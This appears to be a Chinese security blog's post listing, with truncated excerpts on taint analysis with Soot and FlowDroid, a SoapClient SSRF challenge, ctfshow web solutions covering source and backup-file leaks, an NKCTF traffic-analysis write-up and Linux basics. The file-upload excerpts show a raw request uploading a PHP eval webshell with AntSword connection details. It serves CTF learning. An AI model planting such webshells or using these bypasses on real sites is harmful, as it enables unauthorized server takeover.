hacker
未读
为大创做点准备
关于软件漏洞分析应用JAVA 学习为重中之重..
Soot 静态分析
FlowDroid 污点分析
参考文献移动应用安全常用组件Soot软件漏洞分析
2.1 数据流分析使用 Soot 进行程序静态分析, 参考https://fynch3r.github.io/soot%E7%9F%A5%E8%AF%86%E7%82%B9%E6%95%B4%E7%90%86/
2.2 污点分析使用 FlowDroid 进行
2.2.1 污点分析是什么污点 是在代码中直接引入 不受信任的数据源 或者 敏感数据 等数据源这些污点存在于代码中会导致存在 数据完整性 或者 数据保密性 受到威胁
污点分析是跟踪分析污点信息再程序中流动的技术漏洞分析中, 使用污点分析技术将所感兴趣的数据 ( 通常来自程序的外部输入 ) 标记为污点数据, 然后通过相关信息流动从而得知它们是否影响某些关键程序操作, 进而挖掘程序漏洞即 将程序是否存在某种漏洞的问题 转化为 “污点信息是否会被 Sink 点上的操作所使用” 的问题
污点分析就是分析程序中由污点源点 引入的数据是否能够不经清理 (校验等) 处理, 而直 ...
SoapClient 反序列化 SSRF
考点是利用 SoapClient 类反序列化 + CRLF 实现 SSRF,构造请求访问 flag.php 得到 flag反序列化后的 SoapClient 对象在调用不存在的方法时会调用 __call,在 user_agent 中插入 CRLF 也就是 \r\n 控制 header 和 body 构造想要的请求
0x01 Soap( 1 ) soap
SOAP : Simple Object Access Protocol简单对象访问协议
简单而言,SOAP 是连接或 Web 服务或客户端和 Web 服务之间的接口
其采用 HTTP 作为底层通讯协议,XML 作为数据传送的格式
SOAP 消息基本上是从发送端到接收端的单向传输,但它们常常结合起来执行类似于请求 / 应答的模式
一条 SOAP 消息的组成:一个包含有一个必需的 SOAP 的封装包,一个可选的 SOAP 标头和一个必需的 SOAP 体块的 XML 文档
12345678910111213141516171819<?xml v ...
hacker
未读web 89123456789if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; }}
num 不能含有 0-9 , 但是需要是数字
传入空数组 ( 被认为是零 )
?num[]=1
web 901234567891011if(isset($_GET['num'])){ $num = $_GET['num']; if($num==="4476"){ die("no no no!"); } if(intval($num,0)===44 ...
hacker
未读web 1查看源码 注释部分
web 2禁用右键和 F12, 使用 Ctrl+U 查看源文件(注释部分)
web 3BP 抓取返回包 或者 在’网络’中读取
web 4读取../robots.txt
web 5读取../index.phps
web 6读取../www.zip
web 7.git 泄露 , 访问../.git
web 8.svn 泄露 , 访问../.svn
web 9swp 临时文件泄露
访问 ../index.php.swp
(这是 vim 没有正常保存产生的 index.php 的备份文件)
web 10在’网络’中读取 cookie 值
web 11查找 flag.ctfshow.com 域名下的 txt 记录
域名 txt 记录查询
(这题可能环境坏了 直接给了 wp 和 flag 无法真正复现)
也可以用 nslookup
1nslookup -qt=txt flag.ctfshow.com
web 12提示说 “有时候网站上的公开信息,就是管理员常用密码”
某些信息:
1Help Line ...
hacker
未读web 151 前端检测在 bp 修改文件类型就能绕过前端检测
抓包上传
123456789101112POST /upload.php HTTP/1.1-----------------------------249623824540300659272997113405Content-Disposition: form-data; name="file"; filename="WD.php"Content-Type: image/png<?phpeval($_POST[1]);-----------------------------249623824540300659272997113405--AntSword: ../upload/WD.phpPassword: 1
web 152抓包上传
123456789101112POST /upload.php HTTP/1.1-----------------------------249623824540300659272997113405Content-Disposition: f ...
NKCTF_WP7 题 1400 分 50/1282 队
0x01 签到
关注公众号
发送口令得到 flag
0x02 流量分析
题目-服务器的返回包翻译
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136//1 whoamiroot//2 应该是ifconfig?/bin/sh: 1: ipconfig: not found//3 ifconfigeth0: flags=4163<UP,BROADCAST,RUNNING,M ...
目录0x01 计算机系统结构0x02 安装和配置 CentOS0x03 Linux 基础知识0x04 Linux 文件和目录管理0x05 文件压缩和解压缩0x06 查看和处理文件内容0x07 Linux 文本编辑器0x08 Linux 安装软件0x09 用户和权限管理0x10 Linux 网络管理0x11 系统状态管理
0x01 计算机系统结构1.1 计算机发展历史1.1.1 计算机组成
计算机应用程序
操作系统、编译原理、计算机网络
计算机体系结构
CPU/GPU、内存/硬盘、显示器/键盘
1.1.2 发展历史1) 图灵理论计算的本质是一种机械运动,但它需要信息(指令)控制
2)香农《继电器与开关电路的符号分析》将电路开关和布尔代结合起来
3)冯·诺依曼体系结构一般的计算机的组成:控制器,运算器,存储器,输入设备和输出设备
3)发展历程
1946 电子管计算机
1956 晶体管计算机
1964 集成电路计算机
1972 超大规模继承电路计算机
1.2 计算机硬件1.2.1 CPU 中央处理器
解释指令 处理数据
1 ) 组成
控制单元(Cont ...